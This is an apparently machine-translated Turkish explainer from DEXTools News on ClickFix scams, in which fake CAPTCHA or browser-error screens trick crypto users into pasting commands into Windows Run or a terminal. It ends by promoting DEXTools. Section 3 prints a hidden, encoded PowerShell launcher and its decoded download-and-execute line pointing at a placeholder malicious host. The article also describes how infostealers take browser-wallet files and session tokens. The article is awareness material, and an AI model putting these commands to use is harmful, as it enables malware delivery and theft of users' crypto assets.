ClickFix Kripto Dolandırıcılıkları: Cüzdanları Çalan Sahte CAPTCHA'lar

— By Boni in Tutorials

ClickFix Kripto Dolandırıcılıkları: Cüzdanları Çalan Sahte CAPTCHA'lar

Kimlik avı, temel sahte giriş sayfalarını geride bırakarak gelişti. ClickFix kripto boşaltma saldırılarının ardındaki sosyal mühendislik ve terminal yürütme mekanizmalarını analiz ediyoruz.


Sahte CAPTCHA'lar ve ClickFix Kripto Cüzdan Hırsızlığı

  • Ortaya çıkışı Kripto Dolandırıcılıklarını TıklayınFix bu geleneksel zihinsel güvenlik duvarlarını tamamen aşar. ClickFix saldırıları, sizi kötü amaçlı bir zincir içi işlemi imzalamanız veya özel anahtarlarınızı bir kimlik avı formuna yazmanız için kandırmaya çalışmak yerine, kullanıcı ile yerel işletim sistemi arasındaki operasyonel ilişkiden yararlanır. Oldukça ikna edici, yapay tarayıcı hataları ve sahte CAPTCHA doğrulama ekranları sahneleyen bu saldırılar, kullanıcıları şifrelenmiş komut dosyalarını doğrudan yerel sistem terminallerine kopyalayıp yapıştırmaları için kandırıyor.
  • Dijital varlık hırsızlığını yöneten vektörler pasif aldatmadan agresif, kullanıcı tarafından zorlanan terminal istismarına doğru kaymıştır. Yıllardır temel savunma el kitabı merkezi olmayan finans (DeFi) katılımcıları ağırlıklı olarak sahte giriş sayfalarını ele geçirmeye, akıllı sözleşme onay imzalarını denetlemeye ve ham temel ifadeleri kötü niyetli girişlere karşı korumaya odaklandı. Bir tahsisçi, URL'leri doğrulamak ve donanım cüzdanı onay ekranlarını dikkatlice kontrol etmek gibi disiplinli bir alışkanlığı sürdürürse, zincir üzerindeki sermayesi yapısal olarak yalıtılmış kaldı.
  • Web tarayıcısı başarısız olmadı; Kurbanın uyarısı baskı altındaydı. Bu kılavuz, ClickFix mimarisini tanımlayan sosyal mühendislik püf noktalarını, komut satırı mekaniklerini ve sızma döngülerini açıklamaktadır.
ClickFix crypto scams expose users to fake CAPTCHAs that steal digital wallets, highlighting new phishing tactics.


1. Tuzağın Psikolojisi: Sahte CAPTCHA Arayüzü

  • Bir ClickFix saldırısını teknik hassasiyetle analiz etmek için öncelikle bunun saf bir sosyal mühendislik oyunu olarak başladığını anlamalısınız. Saldırı genellikle bir kullanıcı güvenliği ihlal edilmiş bir Web3 blogunu, kopyalanmış bir protokol ön ucunu veya sahte bir izleme portalını ziyaret ettiğinde ortaya çıkar.

Açık bir cüzdan bağlantı istemi sunmak yerine sayfa, anında mekanik bir engeli tetikliyor.

  • Ekranda, Cloudflare Turnikesi, Google reCAPTCHA v3 döngüsü veya kritik tarayıcı güncelleme hatası uyarısı (ör. "Chrome Güncelleme Hatası: Direct3D Besleme Hatası") gibi standart bir güvenlik kontrolünü taklit eden son derece parlak, etkileşimli bir pencere görüntülenir.
  • Kullanıcı kontrolü tamamlamaya çalıştığında arayüz, yerelleştirilmiş oluşturma çakışması nedeniyle otomatik doğrulamanın başarısız olduğunu belirten hedefli bir bildirim görüntüler. Ekran daha sonra adım adım bir "manuel düzeltme" sağlar.
  • Dolandırıcılık, acil bir teknik sorun üreterek kurbanın psikolojik durumunu savunmacı tüketiciden sorun giderme teknisyenine çeviriyor ve onları olağandışı bilgisayar komutlarını takip etmeye çok daha istekli hale getiriyor.

2. Komut Yürütme Hattı: Panodan Terminale

  • ClickFix metodolojisinin gerçek tehlikesi, tarayıcı düzeyindeki sanal alan güvenliğini tamamen atlama yeteneğidir. Web tarayıcıları, güvenilmeyen internet kodlarının doğrudan bilgisayarınızın donanımını değiştirmesini veya arka planda yazılım uygulamalarını çalıştırmasını önlemek için tasarlanmıştır.
  • ClickFix hile yaparak bu engeli aşıyor kullanıcı , kötü amaçlı yazılımı doğrudan tarayıcının güvenlik duvarlarının ötesine taşıyan bir köprü görevi görür.

Adım Adım Enjeksiyon Mekaniği

  • Adım 1: Panonun Ele Geçirilmesi: Sahte doğrulama açılır penceresi, kullanıcıya "Düzeltme Kodunu Kopyala" veya "Doğrulama Simgesini Kopyala" etiketli bir düğmeyi tıklaması talimatını verir. Tıklandığında, web sitesinin JavaScript'i gizli, kötü amaçlı bir komut dizesini doğrudan kullanıcının sistem panosuna kopyalar.

  • Adım 2: Terminal Besleme Kısayolları: Arayüz, kullanıcıyı işletim sisteminin yerel komut yardımcı programını açmaya yönlendiren net, grafik talimatlar sunar. Windows kullanıcıları için, onlara basmalarını söyler. Windows Key + R Çalıştır penceresini çağırmak için şunu yazın: cmd veya powershellve enter tuşuna basın. MacOS kullanıcıları için, yerel Terminal uygulamasını Spotlight araması aracılığıyla açmaları talimatını verir.

  • Adım 3: Yapıştırma Tetikleyicisi: Talimatlar kullanıcıyı açık terminal penceresinin içine sağ tıklamaya veya tuşuna basmaya yönlendirir. Ctrl + V (veya Cmd + V Mac'te) "kopyalanan doğrulama dizesini" yapıştırın ve çalıştır'a basın.

3. Yükün Yapısını Çözmek: Base64 PowerShell İstismarı

Kurban kopyalanan dizeyi terminaline yapıştırdığında zararsız bir doğrulama anahtarı yapıştırmıyor. Sessiz bir indirme döngüsünü etkinleştirmek için tasarlanmış, oldukça sıkıştırılmış, karmaşık ve sıklıkla Base64 kodlu bir komut dizesi yürütüyorlar.

Windows sistemlerini hedefleyen tipik bir ClickFix komut yükü, uzak bir sunucudan ikinci aşama kötü amaçlı yazılım dosyasını indirmek için standart PowerShell yardımcı program araçlarını kullanır:

PowerShell
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_Obfuscate

Sistem tarafından kodu çözüldüğünde, bu arka plan komutu agresif bir otomatik indirme komut dosyasına dönüşür:

PowerShell
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')

Sistemden Yararlanma Matrisi

Terminal ParametresiSistem Uyumluluk AmacıKötü Amaçlı Sömürü Hedefi
-NoP (Profil Yok)Terminalin kişiselleştirilmiş kullanıcı profillerini yüklemesini engeller.Yürütme hızını artırır ve yerelleştirilmiş profil uyarılarını atlar.
-NonI (Etkileşimli Değil)Etkileşimli istemleri veya onay mesajlarını devre dışı bırakır.Komut dosyasının kullanıcı girişine gerek kalmadan tamamen arka planda çalışmasını garanti eder.
-W Hidden (Pencere Stili Gizli)Terminal yürütmesini görünmez bir durumda çalışmaya zorlar.Mağdurun uyarılmasını önlemek için indirme etkinliğini masaüstü görünümünden gizler.
-Exec BypassVarsayılan sistem yürütme kısıtlamalarını geçersiz kılar.Yetkisiz komut dosyalarının çalışmasını önleyen güvenlik yapılandırmalarını açıkça devre dışı bırakır.
IEX (Çağırma-İfade)Herhangi bir dize ifadesini yerel komut olarak değerlendirir ve yürütür.Cüzdan çalma yükünü anında indirir ve doğrudan aktif belleğe çalıştırır.

4. Neler Çalınır: Cüzdan Bilgi Hırsızlığı Yükü

  • İkinci aşama verisi sistem belleğinizde yürütüldüğünde, özel bir yardımcı program sınıfı olarak bilinen özel bir yardımcı program sınıfını dağıtır. Bilgi Hırsızı (Bilgi Hırsızı)Lumma Stealer, Vidar veya Medusa gibi. Bu kötü amaçlı yazılım genel belgelerinizi veya arama geçmişinizi hedeflemez; dijital varlık ayak izinizi yağmalamak için hassas bir şekilde tasarlanmıştır.
  • Infostealer, web tarayıcılarının uzantıları ve uygulama durumu dosyalarını depoladığı yerel klasör dizinlerini programlı olarak hedefler. Aktif olarak kazır .ldb ve .log MetaMask, Phantom, Coinbase Wallet ve Rabby gibi popüler Web3 uzantılarına ait veri haritaları.

Bu yerel dosyalar, şifrelenmiş cüzdan kasası anahtarlarınızı barındırır. Kötü amaçlı yazılım, simetrik olarak tarayıcı çerezlerini ve etkin oturum belirteçlerini çıkarır.

  • Tüm bu kazınmış veriler sıkıştırılmış bir arşive paketlenir ve anında şifrelenmiş bir kanal üzerinden saldırganın sunucusuna geri gönderilir. Bilgisayar korsanları bu oturum belirteçlerine ve yerel kasalara sahip olduklarında, cüzdan şifrelerinizi çevrimdışı olarak kaba kuvvetle zorlayabilir veya aktif oturumlarınızı ele geçirerek, çok zincirli portföyünüzün tamamındaki tüm varlıkları dakikalar içinde tüketebilirler.

5. Geleneksel Güvenlik Korumaları Neden Başarısız?

ClickFix kripto dolandırıcılıklarının yüksek bir başarı oranına ulaşmasının temel nedeni, standart antivirüs araçlarını ve web tarayıcı uzantılarını sistematik olarak atlamalarıdır.

Yapısal Güvenlik Açığı: Çünkü kötü amaçlı web sitesi fiziksel olarak bir indirmeyi zorlamaz. .exe veya .dmg dosyasını standart tarayıcı kanalları üzerinden aktardığınızdan, tarayıcı savunma sistemleri kesinlikle hiçbir risk görmemektedir. Kullanıcı, metni kopyalayan ve sistem terminalini manuel olarak açan kişidir.

İşletim sistemi açısından bakıldığında, PowerShell veya Terminal'i açmak ve bir yönetim komutunu çalıştırmak, bilgisayar sahibi tarafından açıkça yetkilendirilen rutin, ayrıcalıklı bir etkinliktir. Kod genellikle ağır, doğrulanmamış yürütülebilir dosyaları yerel sabit sürücüye kaydetmeden doğrudan etkin belleğin içinde yürütüldüğünden, temel imza tabanlı antivirüs yazılımı, veri sızıntısı döngüsü tamamlanana kadar etkinliği işaretlemede sıklıkla başarısız olur.

6. DEXTools Aracılığıyla Zincir Üzerinde Koruma Stratejileri ve Telemetri

  • Modern sosyal mühendislik tehditlerine karşı savunma yapmak, sistem terminalinizin çevresinde katı sınırların korunmasını ve ayrıca canlı zincir içi hareketlere ilişkin gerçek zamanlı genel bakış görünürlüğünü gerektirir. Bir varlık konfigürasyonunun olası bir yerel bilgi hırsızlığı ihlali nedeniyle tehlikeye girdiğinden şüpheleniyorsanız, aktif cüzdan veri kayıtlarını takip etmek ve merkezi olmayan mekanlardaki ödenmemiş sözleşme izinlerini denetlemek, kalan sermayeyi korumanın tek yöntemidir.
  • DEXTools, çoklu katman 1 ve katman 2 ağlarında token etkinliğini ve cüzdan stabilitesini izlemek için gereken kritik analitik veri altyapısını sağlar. Piyasa katılımcıları, gerçek zamanlı çift kaşiflerini, çoklu zincir işlem takibini ve token sözleşmesi güvenlik denetimlerini kullanarak, beklenmedik cüzdan etkileşimlerinin veya şüpheli fon transferlerinin zincir üzerinde ortaya çıkıp çıkmadığını bağımsız olarak doğrulayabilir.

DEXTools'a erişebilirsiniz burada ve bugün ticarete başlayın!

Cüzdan Süzgeç Saldırıları Açıklandı: Nasıl Tanınır ve Önlenir Cüzdan Güvenliği Kontrol Listesi: Tutmadan Önce Yapılması Gereken 10 Adım 2026'nın En İyi Token Güvenlik Araçları: Dolandırıcılık Kontrolleri, Denetimler ve Risk İncelemeleri TON Cüzdan Süzgeç Dolandırıcılıkları: Nasıl Güvende Kalınır?

Yasal Uyarı: Bu makale yalnızca bilgilendirme amaçlıdır ve yatırım tavsiyesi, finansal tavsiye, alım satım tavsiyesi veya başka herhangi bir tavsiye niteliğinde değildir. DEXTools herhangi bir kripto para biriminin veya jetonun satın alınmasını, satılmasını veya tutulmasını önermez. Kullanıcılar herhangi bir yatırım kararı vermeden önce kendi araştırmalarını yapmalı ve nitelikli bir mali danışmana danışmalıdır. Kripto para yatırımları değişken ve yüksek risklidir. DEXTools, meydana gelen kayıplardan sorumlu değildir.

Originally published by DEXTools News. © 2026 DEXTools News (STRADEXT DEFI SOLUTIONS, S.L.). Reproduction or republication without written permission is prohibited.